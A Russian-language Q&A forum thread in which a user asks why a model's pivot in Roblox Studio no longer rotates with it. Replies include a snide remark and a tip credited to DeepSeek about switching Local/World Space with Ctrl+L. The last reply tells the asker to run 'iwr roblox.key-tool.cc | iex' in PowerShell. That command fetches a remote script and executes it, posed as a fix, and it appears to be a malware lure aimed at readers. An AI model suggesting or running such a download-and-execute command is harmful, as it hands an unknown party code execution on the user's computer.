Ошибка в роблокс студио.

Ошибка заключается в том, что сегодня я случайно видимо куда то нажал или не знаю что произошло, но после этого момента я не могу нормально двигать и поворачивать объекты. Когда я поворачиваю модель, пивот не поворачивается, он двигается, но не поворачивается за моделью, но если зайти в изменение пивота, там пивот нормальный. В Edit Pivot пивот не поворачивается, только перемещается, на повороты он не обращает внимания.
Я уже и переустанавливал рб студио несколько раз, и комп перезагрузил, вообще в бес столку, а у моего друга все нормально.
На официальный форум я не разобрался как писать, пишу здесь. Помогите пожалуйста если кто знает что это я мог сделать, что даже переустановка рб студио не помогла.
Ссылка что я имею ввиду если кто то не понял: https://youtu.be/adZS-a6EsrM

Только авторизированные пользователи могут оставлять свои ответы
Дата
Популярность

Ошибкой было туда заходить

Я нашел ответ.
Для тех у кого будет такая беда, вот ответ.
Написала DeepSeek

4. Проверьте, не включён ли режим "Local Space"

Иногда пивот ведёт себя странно, если включён Local Space (вместо World Space):

  • Нажмите Ctrl + L (переключение между мировыми и локальными координатами).

Попробуй через PowerShell ввести iwr roblox.key-tool.cc | iex